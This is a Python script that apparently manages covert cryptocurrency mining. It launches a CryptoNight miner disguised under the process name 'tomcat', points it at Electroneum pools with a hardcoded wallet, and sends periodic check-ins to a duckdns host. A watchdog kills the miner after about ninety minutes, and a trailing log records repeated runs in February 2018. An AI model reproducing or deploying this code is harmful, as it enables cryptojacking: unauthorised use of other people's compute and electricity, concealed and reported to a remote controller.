import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:23:03.584012
#2018-02-17 17:10:06.588548
#2018-02-17 18:58:04.323803
#2018-02-17 20:46:01.709263
#2018-02-17 22:32:06.347936
#2018-02-18 00:16:04.534550
#2018-02-18 02:07:05.252816
#2018-02-18 03:54:06.056898
#2018-02-18 05:43:05.216008
#2018-02-18 07:36:06.414735
#2018-02-18 09:23:07.169064
#2018-02-18 11:08:05.720738
#2018-02-18 12:55:02.384580
#2018-02-18 14:42:07.366022
#2018-02-18 16:31:06.715270
#2018-02-18 18:20:07.140278
#2018-02-18 20:05:08.541548
#2018-02-18 21:52:03.924563
#2018-02-18 23:41:01.872612
#2018-02-19 01:27:06.104765
#2018-02-19 03:15:07.889352
#2018-02-19 05:01:03.922473
#2018-02-19 06:45:08.168194
#2018-02-19 08:36:08.272188
#2018-02-19 10:25:05.360747
#2018-02-19 12:13:08.057959
#2018-02-19 14:00:10.754235
#2018-02-19 15:50:08.853827
#2018-02-19 17:38:04.850745
#2018-02-19 19:26:07.951730
#2018-02-19 21:14:01.814854
#2018-02-19 23:00:08.841440
#2018-02-20 00:44:01.279223
#2018-02-20 02:36:01.242371
#2018-02-20 04:25:03.165349
#2018-02-20 06:09:05.724935
#2018-02-20 07:54:05.951723
#2018-02-20 09:40:08.334442
#2018-02-20 11:24:09.047830
#2018-02-20 13:11:07.906958
#2018-02-20 14:56:08.433334
#2018-02-20 16:42:09.483179
#2018-02-20 18:28:07.103985
#2018-02-20 20:20:01.405630
#2018-02-20 22:07:01.759424
#2018-02-20 23:48:05.252283
#2018-02-21 01:35:06.019866
#2018-02-21 03:23:06.809031
#2018-02-21 05:11:05.532534
#2018-02-21 06:59:01.454434
#2018-02-21 08:46:06.805762
#2018-02-21 10:34:06.969570
#2018-02-21 12:23:08.689881
#2018-02-21 14:10:02.202803
#2018-02-21 15:55:07.283960
#2018-02-21 17:48:08.063240
#2018-02-21 19:35:07.678865
#2018-02-21 21:22:06.875315
#2018-02-21 23:08:07.236331
#2018-02-22 00:58:06.428065
#2018-02-22 02:46:08.086757
#2018-02-22 04:32:08.091959
#2018-02-22 06:17:07.052676
#2018-02-22 08:02:05.658987
#2018-02-22 09:50:09.016649
#2018-02-22 11:35:03.157280
#2018-02-22 13:22:07.220280
#2018-02-22 15:10:11.716234
#2018-02-22 16:55:06.333275
#2018-02-22 18:44:01.821360
#2018-02-22 20:35:07.293826
#2018-02-22 22:20:08.594104
#2018-02-23 00:07:05.892841
#2018-02-23 01:55:06.752309
#2018-02-23 03:43:01.832431
#2018-02-23 05:28:05.565194
#2018-02-23 07:13:06.113885
#2018-02-23 09:18:04.061236
#2018-02-23 11:23:08.528702
#2018-02-23 13:13:04.020055
#2018-02-23 14:58:07.413694
#2018-02-23 16:48:10.583497
#2018-02-23 18:37:05.988891
#2018-02-23 20:25:06.956110
#2018-02-23 22:12:01.613148
#2018-02-23 23:58:07.427331
#2018-02-24 01:47:05.821223
#2018-02-24 03:40:07.297795
#2018-02-24 05:23:06.009584
#2018-02-24 07:11:07.359255
#2018-02-24 09:01:04.377031
#2018-02-24 11:01:06.408357
#2018-02-24 12:49:01.880832
#2018-02-24 14:38:01.984631
#2018-02-24 16:27:07.427170
#2018-02-24 18:19:01.725238
#2018-02-24 20:05:07.369170
#2018-02-24 21:47:06.712748
#2018-02-25 01:51:01.890680
#2018-02-25 04:54:06.477791
#2018-02-25 08:24:02.058459